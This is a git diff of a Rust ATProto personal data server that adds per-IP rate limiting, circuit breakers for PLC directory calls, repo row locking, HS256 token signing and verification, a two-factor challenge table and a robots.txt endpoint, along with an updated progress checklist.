- Key encryption: User signing keys encrypted at rest using AES-256-GCM with keys derived via HKDF from KEY_ENCRYPTION_KEY environment variable.
## PDS-Level App Endpoints
These endpoints need to be implemented at the PDS level (not just proxied to appview).
@@ -178,22 +185,6 @@ These are implemented at PDS level to enable local-first reads (read-after-write
### Notification (`app.bsky.notification`)
- [x] Implement `app.bsky.notification.registerPush` (push notification registration, proxied).
## Deprecated Sync Endpoints (for compatibility)
- [ ] Implement `com.atproto.sync.getCheckout` (deprecated, still needed for compatibility).
- [ ] Implement `com.atproto.sync.getHead` (deprecated, still needed for compatibility).
## Misc HTTP Endpoints
- [ ] Implement `/robots.txt` endpoint.
## Record Schema Validation
- [ ] Handle this generically.
## Preference Storage
User preferences (for app.bsky.actor.getPreferences/putPreferences):
- [x] Create preferences table for storing user app preferences.
- [x] Implement `app.bsky.actor.getPreferences` handler (read from postgres, proxy fallback).
- [x] Implement `app.bsky.actor.putPreferences` handler (write to postgres).
## Infrastructure & Core Components
- [x] Sequencer (Event Log)
- [x] Implement a `Sequencer` (backed by `repo_seq` table).
@@ -206,32 +197,53 @@ User preferences (for app.bsky.actor.getPreferences/putPreferences):
- [x] Manage Repo Root in `repos` table.
- [x] Implement Atomic Repo Transactions.
- [x] Ensure `blocks` write, `repo_root` update, `records` index update, and `sequencer` event are committed in a single transaction.
- [ ] Implement concurrency control (row-level locking on `repos` table) to prevent concurrent writes to the same repo.
- [x] Implement concurrency control (row-level locking via FOR UPDATE).
- [ ] DID Cache
- [ ] Implement caching layer for DID resolution (Redis or in-memory).
- [ ] Handle cache invalidation/expiry.
- [ ] Background Jobs
- [ ] Implement `Crawlers` service (debounce notifications to relays).
- [x] Crawlers Service
- [x] Implement `Crawlers` service (debounce notifications to relays).
- [x] 20-minute notification debounce.
- [x] Circuit breaker for relay failures.
- [x] Notification Service
- [x] Queue-based notification system with database table
- [x] Background worker polling for pending notifications
- [x] Extensible sender trait for multiple channels
- [x] Email sender via OS sendmail/msmtp
- [ ] Discord bot sender
- [ ] Telegram bot sender
- [ ] Signal bot sender
- [x] Discord webhook sender
- [x] Telegram bot sender
- [x] Signal CLI sender
- [x] Helper functions for common notification types (welcome, password reset, email verification, etc.)
- [x] Respect user's `preferred_notification_channel` setting for non-email-specific notifications
- [ ] Image Processing
- [ ] Implement image resize/formatting pipeline (for blob uploads).
- [x] Image Processing
- [x] Implement image resize/formatting pipeline (for blob uploads).
- [x] WebP conversion for thumbnails.
- [x] EXIF stripping.
- [x] File size limits (10MB default).
- [x] IPLD & MST
- [x] Implement Merkle Search Tree logic for repo signing.
- [x] Implement CAR (Content Addressable Archive) encoding/decoding.
- [ ] Validation
- [ ] DID PLC Operations (Sign rotation keys).
- [ ] Fix any remaining TODOs in the code, everywhere, full stop.
- [x] Cycle detection in CAR export.
- [x] Rate Limiting
- [x] Per-IP rate limiting on login (10/min).
- [x] Per-IP rate limiting on OAuth token endpoint (30/min).
- [x] Per-IP rate limiting on password reset (5/hour).
- [x] Per-IP rate limiting on account creation (10/hour).
- [x] Circuit Breakers
- [x] PLC directory circuit breaker (5 failures → open, 60s timeout).
- [x] Relay notification circuit breaker (10 failures → open, 30s timeout).
- [x] Security Hardening
- [x] Email header injection prevention (CRLF sanitization).
- [x] Signal command injection prevention (phone number validation).
- [x] Constant-time signature comparison.
- [x] SSRF protection for outbound requests.
## Web Management UI
## Lewis' fabulous mini-list of remaining TODOs
- [ ] DID resolution caching (valkey).
- [ ] Record schema validation (generic validation framework).
- [ ] Fix any remaining TODOs in the code.
## Future: Web Management UI
A single-page web app for account management. The frontend (JS framework) calls existing ATProto XRPC endpoints - no server-side rendering or bespoke HTML form handlers.
### Architecture

View File

@@ -0,0 +1,16 @@
ALTER TABLE users ADD COLUMN two_factor_enabled BOOLEAN NOT NULL DEFAULT FALSE;
ALTER TYPE notification_type ADD VALUE 'two_factor_code';
CREATE TABLE oauth_2fa_challenge (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
did TEXT NOT NULL REFERENCES users(did) ON DELETE CASCADE,
request_uri TEXT NOT NULL,
code TEXT NOT NULL,
attempts INTEGER NOT NULL DEFAULT 0,
created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
expires_at TIMESTAMPTZ NOT NULL DEFAULT NOW() + INTERVAL '10 minutes'
);
CREATE INDEX idx_oauth_2fa_challenge_request_uri ON oauth_2fa_challenge(request_uri);
CREATE INDEX idx_oauth_2fa_challenge_expires ON oauth_2fa_challenge(expires_at);

View File

@@ -3,7 +3,7 @@ use crate::state::AppState;
use axum::{
Json,
extract::State,
http::StatusCode,
http::{HeaderMap, StatusCode},
response::{IntoResponse, Response},
};
use bcrypt::{DEFAULT_COST, hash};
@@ -16,6 +16,22 @@ use serde_json::json;
use std::sync::Arc;
use tracing::{error, info, warn};
fn extract_client_ip(headers: &HeaderMap) -> String {
if let Some(forwarded) = headers.get("x-forwarded-for") {
if let Ok(value) = forwarded.to_str() {
if let Some(first_ip) = value.split(',').next() {
return first_ip.trim().to_string();
}
}
}
if let Some(real_ip) = headers.get("x-real-ip") {
if let Ok(value) = real_ip.to_str() {
return value.trim().to_string();
}
}
"unknown".to_string()
}
#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct CreateAccountInput {
@@ -38,9 +54,24 @@ pub struct CreateAccountOutput {
pub async fn create_account(
State(state): State<AppState>,
headers: HeaderMap,
Json(input): Json<CreateAccountInput>,
) -> Response {
info!("create_account called");
let client_ip = extract_client_ip(&headers);
if state.rate_limiters.account_creation.check_key(&client_ip).is_err() {
warn!(ip = %client_ip, "Account creation rate limit exceeded");
return (
StatusCode::TOO_MANY_REQUESTS,
Json(json!({
"error": "RateLimitExceeded",
"message": "Too many account creation attempts. Please try again later."
})),
)
.into_response();
}
if input.handle.contains('!') || input.handle.contains('@') {
return (
StatusCode::BAD_REQUEST,
@@ -184,8 +215,40 @@ pub async fn create_account(
let user_id = match user_insert {
Ok(row) => row.id,
Err(e) => {
if let Some(db_err) = e.as_database_error() {
if db_err.code().as_deref() == Some("23505") {
let constraint = db_err.constraint().unwrap_or("");
if constraint.contains("handle") || constraint.contains("users_handle") {
return (
StatusCode::BAD_REQUEST,
Json(json!({
"error": "HandleNotAvailable",
"message": "Handle already taken"
})),
)
.into_response();
} else if constraint.contains("email") || constraint.contains("users_email") {
return (
StatusCode::BAD_REQUEST,
Json(json!({
"error": "InvalidEmail",
"message": "Email already registered"
})),
)
.into_response();
} else if constraint.contains("did") || constraint.contains("users_did") {
return (
StatusCode::BAD_REQUEST,
Json(json!({
"error": "AccountAlreadyExists",
"message": "An account with this DID already exists"
})),
)
.into_response();
}
}
}
error!("Error inserting user: {:?}", e);
// TODO: Check for unique constraint violation on email/did specifically
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),

View File

@@ -1,6 +1,7 @@
use crate::api::ApiError;
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
use crate::plc::{
create_update_op, sign_operation, PlcClient, PlcError, PlcService,
create_update_op, sign_operation, PlcClient, PlcError, PlcOpOrTombstone, PlcService,
};
use crate::state::AppState;
use axum::{
@@ -14,7 +15,7 @@ use k256::ecdsa::SigningKey;
use serde::{Deserialize, Serialize};
use serde_json::{json, Value};
use std::collections::HashMap;
use tracing::{error, info};
use tracing::{error, info, warn};
#[derive(Debug, Deserialize)]
#[serde(rename_all = "camelCase")]
@@ -166,9 +167,27 @@ pub async fn sign_plc_operation(
};
let plc_client = PlcClient::new(None);
let last_op = match plc_client.get_last_op(did).await {
let did_clone = did.clone();
let result: Result<PlcOpOrTombstone, CircuitBreakerError<PlcError>> = with_circuit_breaker(
&state.circuit_breakers.plc_directory,
|| async { plc_client.get_last_op(&did_clone).await },
)
.await;
let last_op = match result {
Ok(op) => op,
Err(PlcError::NotFound) => {
Err(CircuitBreakerError::CircuitOpen(e)) => {
warn!("PLC directory circuit breaker open: {}", e);
return (
StatusCode::SERVICE_UNAVAILABLE,
Json(json!({
"error": "ServiceUnavailable",
"message": "PLC directory service temporarily unavailable"
})),
)
.into_response();
}
Err(CircuitBreakerError::OperationFailed(PlcError::NotFound)) => {
return (
StatusCode::NOT_FOUND,
Json(json!({
@@ -178,7 +197,7 @@ pub async fn sign_plc_operation(
)
.into_response();
}
Err(e) => {
Err(CircuitBreakerError::OperationFailed(e)) => {
error!("Failed to fetch PLC operation: {:?}", e);
return (
StatusCode::BAD_GATEWAY,

View File

@@ -1,5 +1,6 @@
use crate::api::ApiError;
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient};
use crate::circuit_breaker::{with_circuit_breaker, CircuitBreakerError};
use crate::plc::{signing_key_to_did_key, validate_plc_operation, PlcClient, PlcError};
use crate::state::AppState;
use axum::{
extract::State,
@@ -183,16 +184,38 @@ pub async fn submit_plc_operation(
}
let plc_client = PlcClient::new(None);
if let Err(e) = plc_client.send_operation(did, &input.operation).await {
error!("Failed to submit PLC operation: {:?}", e);
return (
StatusCode::BAD_GATEWAY,
Json(json!({
"error": "UpstreamError",
"message": format!("Failed to submit to PLC directory: {}", e)
})),
)
.into_response();
let operation_clone = input.operation.clone();
let did_clone = did.clone();
let result: Result<(), CircuitBreakerError<PlcError>> = with_circuit_breaker(
&state.circuit_breakers.plc_directory,
|| async { plc_client.send_operation(&did_clone, &operation_clone).await },
)
.await;
match result {
Ok(()) => {}
Err(CircuitBreakerError::CircuitOpen(e)) => {
warn!("PLC directory circuit breaker open: {}", e);
return (
StatusCode::SERVICE_UNAVAILABLE,
Json(json!({
"error": "ServiceUnavailable",
"message": "PLC directory service temporarily unavailable"
})),
)
.into_response();
}
Err(CircuitBreakerError::OperationFailed(e)) => {
error!("Failed to submit PLC operation: {:?}", e);
return (
StatusCode::BAD_GATEWAY,
Json(json!({
"error": "UpstreamError",
"message": format!("Failed to submit to PLC directory: {}", e)
})),
)
.into_response();
}
}
if let Err(e) = sqlx::query!(

View File

@@ -10,6 +10,7 @@ pub mod proxy_client;
pub mod read_after_write;
pub mod repo;
pub mod server;
pub mod temp;
pub mod validation;
pub use error::ApiError;

View File

@@ -167,57 +167,57 @@ pub async fn list_records(
let limit = input.limit.unwrap_or(50).clamp(1, 100);
let reverse = input.reverse.unwrap_or(false);
// Simplistic query construction - no sophisticated cursor handling or rkey ranges for now, just basic pagination
// TODO: Implement rkeyStart/End and correct cursor logic
let limit_i64 = limit as i64;
let rows_res = if let Some(cursor) = &input.cursor {
if reverse {
sqlx::query!(
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4",
user_id,
input.collection,
cursor,
limit_i64
)
let order = if reverse { "ASC" } else { "DESC" };
let rows_res: Result<Vec<(String, String)>, sqlx::Error> = if let Some(cursor) = &input.cursor {
let comparator = if reverse { ">" } else { "<" };
let query = format!(
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey {} $3 ORDER BY rkey {} LIMIT $4",
comparator, order
);
sqlx::query_as(&query)
.bind(user_id)
.bind(&input.collection)
.bind(cursor)
.bind(limit_i64)
.fetch_all(&state.db)
.await
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
} else {
sqlx::query!(
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4",
user_id,
input.collection,
cursor,
limit_i64
)
.fetch_all(&state.db)
.await
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
}
} else {
if reverse {
sqlx::query!(
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3",
user_id,
input.collection,
limit_i64
)
.fetch_all(&state.db)
.await
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
} else {
sqlx::query!(
"SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3",
user_id,
input.collection,
limit_i64
)
.fetch_all(&state.db)
.await
.map(|rows| rows.into_iter().map(|r| (r.rkey, r.record_cid)).collect::<Vec<_>>())
let mut conditions = vec!["repo_id = $1", "collection = $2"];
let mut param_idx = 3;
if input.rkey_start.is_some() {
conditions.push("rkey > $3");
param_idx += 1;
}
if input.rkey_end.is_some() {
conditions.push(if param_idx == 3 { "rkey < $3" } else { "rkey < $4" });
param_idx += 1;
}
let limit_idx = param_idx;
let query = format!(
"SELECT rkey, record_cid FROM records WHERE {} ORDER BY rkey {} LIMIT ${}",
conditions.join(" AND "),
order,
limit_idx
);
let mut query_builder = sqlx::query_as::<_, (String, String)>(&query)
.bind(user_id)
.bind(&input.collection);
if let Some(start) = &input.rkey_start {
query_builder = query_builder.bind(start);
}
if let Some(end) = &input.rkey_end {
query_builder = query_builder.bind(end);
}
query_builder.bind(limit_i64).fetch_all(&state.db).await
};
let rows = match rows_res {

View File

@@ -58,6 +58,34 @@ pub async fn commit_and_log(
let mut tx = state.db.begin().await
.map_err(|e| format!("Failed to begin transaction: {}", e))?;
let lock_result = sqlx::query!(
"SELECT repo_root_cid FROM repos WHERE user_id = $1 FOR UPDATE NOWAIT",
user_id
)
.fetch_optional(&mut *tx)
.await;
match lock_result {
Err(e) => {
if let Some(db_err) = e.as_database_error() {
if db_err.code().as_deref() == Some("55P03") {
return Err("ConcurrentModification: Another request is modifying this repo".to_string());
}
}
return Err(format!("Failed to acquire repo lock: {}", e));
}
Ok(Some(row)) => {
if let Some(expected_root) = &current_root_cid {
if row.repo_root_cid != expected_root.to_string() {
return Err("ConcurrentModification: Repo has been modified since last read".to_string());
}
}
}
Ok(None) => {
return Err("Repo not found".to_string());
}
}
sqlx::query!("UPDATE repos SET repo_root_cid = $1 WHERE user_id = $2", new_root_cid.to_string(), user_id)
.execute(&mut *tx)
.await

View File

@@ -4,6 +4,14 @@ use serde_json::json;
use tracing::error;
pub async fn robots_txt() -> impl IntoResponse {
(
StatusCode::OK,
[("content-type", "text/plain")],
"# Hello!\n\n# Crawling the public API is allowed\nUser-agent: *\nAllow: /\n",
)
}
pub async fn describe_server() -> impl IntoResponse {
let domains_str =
std::env::var("AVAILABLE_USER_DOMAINS").unwrap_or_else(|_| "example.com".to_string());

View File

@@ -15,7 +15,7 @@ pub use account_status::{
pub use app_password::{create_app_password, list_app_passwords, revoke_app_password};
pub use email::{confirm_email, request_email_update, update_email};
pub use invite::{create_invite_code, create_invite_codes, get_account_invite_codes};
pub use meta::{describe_server, health};
pub use meta::{describe_server, health, robots_txt};
pub use password::{request_password_reset, reset_password};
pub use service_auth::get_service_auth;
pub use session::{create_session, delete_session, get_session, refresh_session};

View File

@@ -2,7 +2,7 @@ use crate::state::AppState;
use axum::{
Json,
extract::State,
http::StatusCode,
http::{HeaderMap, StatusCode},
response::{IntoResponse, Response},
};
use bcrypt::{hash, DEFAULT_COST};
@@ -15,6 +15,22 @@ fn generate_reset_code() -> String {
crate::util::generate_token_code()
}
fn extract_client_ip(headers: &HeaderMap) -> String {
if let Some(forwarded) = headers.get("x-forwarded-for") {
if let Ok(value) = forwarded.to_str() {
if let Some(first_ip) = value.split(',').next() {
return first_ip.trim().to_string();
}
}
}
if let Some(real_ip) = headers.get("x-real-ip") {
if let Ok(value) = real_ip.to_str() {
return value.trim().to_string();
}
}
"unknown".to_string()
}
#[derive(Deserialize)]
pub struct RequestPasswordResetInput {
pub email: String,
@@ -22,8 +38,22 @@ pub struct RequestPasswordResetInput {
pub async fn request_password_reset(
State(state): State<AppState>,
headers: HeaderMap,
Json(input): Json<RequestPasswordResetInput>,
) -> Response {
let client_ip = extract_client_ip(&headers);
if state.rate_limiters.password_reset.check_key(&client_ip).is_err() {
warn!(ip = %client_ip, "Password reset rate limit exceeded");
return (
StatusCode::TOO_MANY_REQUESTS,
Json(json!({
"error": "RateLimitExceeded",
"message": "Too many password reset requests. Please try again later."
})),
)
.into_response();
}
let email = input.email.trim().to_lowercase();
if email.is_empty() {
return (

View File

@@ -4,6 +4,7 @@ use crate::state::AppState;
use axum::{
Json,
extract::State,
http::{HeaderMap, StatusCode},
response::{IntoResponse, Response},
};
use bcrypt::verify;
@@ -11,6 +12,22 @@ use serde::{Deserialize, Serialize};
use serde_json::json;
use tracing::{error, info, warn};
fn extract_client_ip(headers: &HeaderMap) -> String {
if let Some(forwarded) = headers.get("x-forwarded-for") {
if let Ok(value) = forwarded.to_str() {
if let Some(first_ip) = value.split(',').next() {
return first_ip.trim().to_string();
}
}
}
if let Some(real_ip) = headers.get("x-real-ip") {
if let Ok(value) = real_ip.to_str() {
return value.trim().to_string();
}
}
"unknown".to_string()
}
#[derive(Deserialize)]
pub struct CreateSessionInput {
pub identifier: String,
@@ -28,10 +45,24 @@ pub struct CreateSessionOutput {
pub async fn create_session(
State(state): State<AppState>,
headers: HeaderMap,
Json(input): Json<CreateSessionInput>,
) -> Response {
info!("create_session called");
let client_ip = extract_client_ip(&headers);
if state.rate_limiters.login.check_key(&client_ip).is_err() {
warn!(ip = %client_ip, "Login rate limit exceeded");
return (
StatusCode::TOO_MANY_REQUESTS,
Json(json!({
"error": "RateLimitExceeded",
"message": "Too many login attempts. Please try again later."
})),
)
.into_response();
}
let row = match sqlx::query!(
"SELECT u.id, u.did, u.handle, u.password_hash, k.key_bytes, k.encryption_version FROM users u JOIN user_keys k ON u.id = k.user_id WHERE u.handle = $1 OR u.email = $1",
input.identifier

48
src/api/temp.rs Normal file
View File

@@ -0,0 +1,48 @@
use axum::{
Json,
extract::State,
http::{HeaderMap, StatusCode},
response::{IntoResponse, Response},
};
use serde::Serialize;
use serde_json::json;
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
use crate::state::AppState;
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct CheckSignupQueueOutput {
pub activated: bool,
#[serde(skip_serializing_if = "Option::is_none")]
pub place_in_queue: Option<i64>,
#[serde(skip_serializing_if = "Option::is_none")]
pub estimated_time_ms: Option<i64>,
}
pub async fn check_signup_queue(
State(state): State<AppState>,
headers: HeaderMap,
) -> Response {
if let Some(token) = extract_bearer_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok())
) {
if let Ok(user) = validate_bearer_token(&state.db, &token).await {
if user.is_oauth {
return (
StatusCode::FORBIDDEN,
Json(json!({
"error": "Forbidden",
"message": "OAuth credentials are not supported for this endpoint"
})),
).into_response();
}
}
}
Json(CheckSignupQueueOutput {
activated: true,
place_in_queue: None,
estimated_time_ms: None,
}).into_response()
}

View File

@@ -3,9 +3,13 @@ use anyhow::Result;
use base64::Engine as _;
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
use chrono::{DateTime, Duration, Utc};
use hmac::{Hmac, Mac};
use k256::ecdsa::{Signature, SigningKey, signature::Signer};
use sha2::Sha256;
use uuid;
type HmacSha256 = Hmac<Sha256>;
pub const TOKEN_TYPE_ACCESS: &str = "at+jwt";
pub const TOKEN_TYPE_REFRESH: &str = "refresh+jwt";
pub const TOKEN_TYPE_SERVICE: &str = "jwt";
@@ -118,3 +122,97 @@ fn sign_claims_with_type(claims: Claims, key: &SigningKey, typ: &str) -> Result<
Ok(format!("{}.{}", message, signature_b64))
}
pub fn create_access_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
Ok(create_access_token_hs256_with_metadata(did, secret)?.token)
}
pub fn create_refresh_token_hs256(did: &str, secret: &[u8]) -> Result<String> {
Ok(create_refresh_token_hs256_with_metadata(did, secret)?.token)
}
pub fn create_access_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
create_hs256_token_with_metadata(did, SCOPE_ACCESS, TOKEN_TYPE_ACCESS, secret, Duration::minutes(120))
}
pub fn create_refresh_token_hs256_with_metadata(did: &str, secret: &[u8]) -> Result<TokenWithMetadata> {
create_hs256_token_with_metadata(did, SCOPE_REFRESH, TOKEN_TYPE_REFRESH, secret, Duration::days(90))
}
pub fn create_service_token_hs256(did: &str, aud: &str, lxm: &str, secret: &[u8]) -> Result<String> {
let expiration = Utc::now()
.checked_add_signed(Duration::seconds(60))
.expect("valid timestamp")
.timestamp();
let claims = Claims {
iss: did.to_owned(),
sub: did.to_owned(),
aud: aud.to_owned(),
exp: expiration as usize,
iat: Utc::now().timestamp() as usize,
scope: None,
lxm: Some(lxm.to_string()),
jti: uuid::Uuid::new_v4().to_string(),
};
sign_claims_hs256(claims, TOKEN_TYPE_SERVICE, secret)
}
fn create_hs256_token_with_metadata(
did: &str,
scope: &str,
typ: &str,
secret: &[u8],
duration: Duration,
) -> Result<TokenWithMetadata> {
let expires_at = Utc::now()
.checked_add_signed(duration)
.expect("valid timestamp");
let expiration = expires_at.timestamp();
let jti = uuid::Uuid::new_v4().to_string();
let claims = Claims {
iss: did.to_owned(),
sub: did.to_owned(),
aud: format!(
"did:web:{}",
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string())
),
exp: expiration as usize,
iat: Utc::now().timestamp() as usize,
scope: Some(scope.to_string()),
lxm: None,
jti: jti.clone(),
};
let token = sign_claims_hs256(claims, typ, secret)?;
Ok(TokenWithMetadata {
token,
jti,
expires_at,
})
}
fn sign_claims_hs256(claims: Claims, typ: &str, secret: &[u8]) -> Result<String> {
let header = Header {
alg: "HS256".to_string(),
typ: typ.to_string(),
};
let header_json = serde_json::to_string(&header)?;
let claims_json = serde_json::to_string(&claims)?;
let header_b64 = URL_SAFE_NO_PAD.encode(header_json);
let claims_b64 = URL_SAFE_NO_PAD.encode(claims_json);
let message = format!("{}.{}", header_b64, claims_b64);
let mut mac = HmacSha256::new_from_slice(secret)
.map_err(|e| anyhow::anyhow!("Invalid secret length: {}", e))?;
mac.update(message.as_bytes());
let signature = mac.finalize().into_bytes();
let signature_b64 = URL_SAFE_NO_PAD.encode(signature);
Ok(format!("{}.{}", message, signature_b64))
}

View File

@@ -4,7 +4,12 @@ use anyhow::{Context, Result, anyhow};
use base64::Engine as _;
use base64::engine::general_purpose::URL_SAFE_NO_PAD;
use chrono::Utc;
use hmac::{Hmac, Mac};
use k256::ecdsa::{Signature, SigningKey, VerifyingKey, signature::Verifier};
use sha2::Sha256;
use subtle::ConstantTimeEq;
type HmacSha256 = Hmac<Sha256>;
pub fn get_did_from_token(token: &str) -> Result<String, String> {
let parts: Vec<&str> = token.split('.').collect();
@@ -63,6 +68,24 @@ pub fn verify_refresh_token(token: &str, key_bytes: &[u8]) -> Result<TokenData<C
)
}
pub fn verify_access_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
verify_token_hs256_internal(
token,
secret,
Some(TOKEN_TYPE_ACCESS),
Some(&[SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED]),
)
}
pub fn verify_refresh_token_hs256(token: &str, secret: &[u8]) -> Result<TokenData<Claims>> {
verify_token_hs256_internal(
token,
secret,
Some(TOKEN_TYPE_REFRESH),
Some(&[SCOPE_REFRESH]),
)
}
fn verify_token_internal(
token: &str,
key_bytes: &[u8],
@@ -124,3 +147,86 @@ fn verify_token_internal(
Ok(TokenData { claims })
}
fn verify_token_hs256_internal(
token: &str,
secret: &[u8],
expected_typ: Option<&str>,
allowed_scopes: Option<&[&str]>,
) -> Result<TokenData<Claims>> {
let parts: Vec<&str> = token.split('.').collect();
if parts.len() != 3 {
return Err(anyhow!("Invalid token format"));
}
let header_b64 = parts[0];
let claims_b64 = parts[1];
let signature_b64 = parts[2];
let header_bytes = URL_SAFE_NO_PAD
.decode(header_b64)
.context("Base64 decode of header failed")?;
let header: Header =
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
if header.alg != "HS256" {
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
}
if let Some(expected) = expected_typ {
if header.typ != expected {
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
}
}
let signature_bytes = URL_SAFE_NO_PAD
.decode(signature_b64)
.context("Base64 decode of signature failed")?;
let message = format!("{}.{}", header_b64, claims_b64);
let mut mac = HmacSha256::new_from_slice(secret)
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
mac.update(message.as_bytes());
let expected_signature = mac.finalize().into_bytes();
let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
if !is_valid {
return Err(anyhow!("Signature verification failed"));
}
let claims_bytes = URL_SAFE_NO_PAD
.decode(claims_b64)
.context("Base64 decode of claims failed")?;
let claims: Claims =
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
let now = Utc::now().timestamp() as usize;
if claims.exp < now {
return Err(anyhow!("Token expired"));
}
if let Some(scopes) = allowed_scopes {
let token_scope = claims.scope.as_deref().unwrap_or("");
if !scopes.contains(&token_scope) {
return Err(anyhow!("Invalid token scope: {}", token_scope));
}
}
Ok(TokenData { claims })
}
pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
let parts: Vec<&str> = token.split('.').collect();
if parts.len() != 3 {
return Err("Invalid token format".to_string());
}
let header_bytes = URL_SAFE_NO_PAD
.decode(parts[0])
.map_err(|e| format!("Base64 decode failed: {}", e))?;
let header: Header =
serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
Ok(header.alg)
}

307
src/circuit_breaker.rs Normal file
View File

@@ -0,0 +1,307 @@
use std::sync::atomic::{AtomicU32, AtomicU64, Ordering};
use std::sync::Arc;
use std::time::Duration;
use tokio::sync::RwLock;
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum CircuitState {
Closed,
Open,
HalfOpen,
}
pub struct CircuitBreaker {
name: String,
failure_threshold: u32,
success_threshold: u32,
timeout: Duration,
state: Arc<RwLock<CircuitState>>,
failure_count: AtomicU32,
success_count: AtomicU32,
last_failure_time: AtomicU64,
}
impl CircuitBreaker {
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
Self {
name: name.to_string(),
failure_threshold,
success_threshold,
timeout: Duration::from_secs(timeout_secs),
state: Arc::new(RwLock::new(CircuitState::Closed)),
failure_count: AtomicU32::new(0),
success_count: AtomicU32::new(0),
last_failure_time: AtomicU64::new(0),
}
}
pub async fn can_execute(&self) -> bool {
let state = self.state.read().await;
match *state {
CircuitState::Closed => true,
CircuitState::Open => {
let last_failure = self.last_failure_time.load(Ordering::SeqCst);
let now = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap()
.as_secs();
if now - last_failure >= self.timeout.as_secs() {
drop(state);
let mut state = self.state.write().await;
if *state == CircuitState::Open {
*state = CircuitState::HalfOpen;
self.success_count.store(0, Ordering::SeqCst);
tracing::info!(circuit = %self.name, "Circuit breaker transitioning to half-open");
return true;
}
}
false
}
CircuitState::HalfOpen => true,
}
}
pub async fn record_success(&self) {
let state = *self.state.read().await;
match state {
CircuitState::Closed => {
self.failure_count.store(0, Ordering::SeqCst);
}
CircuitState::HalfOpen => {
let count = self.success_count.fetch_add(1, Ordering::SeqCst) + 1;
if count >= self.success_threshold {
let mut state = self.state.write().await;
*state = CircuitState::Closed;
self.failure_count.store(0, Ordering::SeqCst);
self.success_count.store(0, Ordering::SeqCst);
tracing::info!(circuit = %self.name, "Circuit breaker closed after successful recovery");
}
}
CircuitState::Open => {}
}
}
pub async fn record_failure(&self) {
let state = *self.state.read().await;
match state {
CircuitState::Closed => {
let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
if count >= self.failure_threshold {
let mut state = self.state.write().await;
*state = CircuitState::Open;
let now = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap()
.as_secs();
self.last_failure_time.store(now, Ordering::SeqCst);
tracing::warn!(
circuit = %self.name,
failures = count,
"Circuit breaker opened after {} failures",
count
);
}
}
CircuitState::HalfOpen => {
let mut state = self.state.write().await;
*state = CircuitState::Open;
let now = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap()
.as_secs();
self.last_failure_time.store(now, Ordering::SeqCst);
self.success_count.store(0, Ordering::SeqCst);
tracing::warn!(circuit = %self.name, "Circuit breaker reopened after failure in half-open state");
}
CircuitState::Open => {}
}
}
pub async fn state(&self) -> CircuitState {
*self.state.read().await
}
pub fn name(&self) -> &str {
&self.name
}
}
#[derive(Clone)]
pub struct CircuitBreakers {
pub plc_directory: Arc<CircuitBreaker>,
pub relay_notification: Arc<CircuitBreaker>,
}
impl Default for CircuitBreakers {
fn default() -> Self {
Self::new()
}
}
impl CircuitBreakers {
pub fn new() -> Self {
Self {
plc_directory: Arc::new(CircuitBreaker::new("plc_directory", 5, 3, 60)),
relay_notification: Arc::new(CircuitBreaker::new("relay_notification", 10, 5, 30)),
}
}
}
#[derive(Debug)]
pub struct CircuitOpenError {
pub circuit_name: String,
}
impl std::fmt::Display for CircuitOpenError {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "Circuit breaker '{}' is open", self.circuit_name)
}
}
impl std::error::Error for CircuitOpenError {}
pub async fn with_circuit_breaker<T, E, F, Fut>(
circuit: &CircuitBreaker,
operation: F,
) -> Result<T, CircuitBreakerError<E>>
where
F: FnOnce() -> Fut,
Fut: std::future::Future<Output = Result<T, E>>,
{
if !circuit.can_execute().await {
return Err(CircuitBreakerError::CircuitOpen(CircuitOpenError {
circuit_name: circuit.name().to_string(),
}));
}
match operation().await {
Ok(result) => {
circuit.record_success().await;
Ok(result)
}
Err(e) => {
circuit.record_failure().await;
Err(CircuitBreakerError::OperationFailed(e))
}
}
}
#[derive(Debug)]
pub enum CircuitBreakerError<E> {
CircuitOpen(CircuitOpenError),
OperationFailed(E),
}
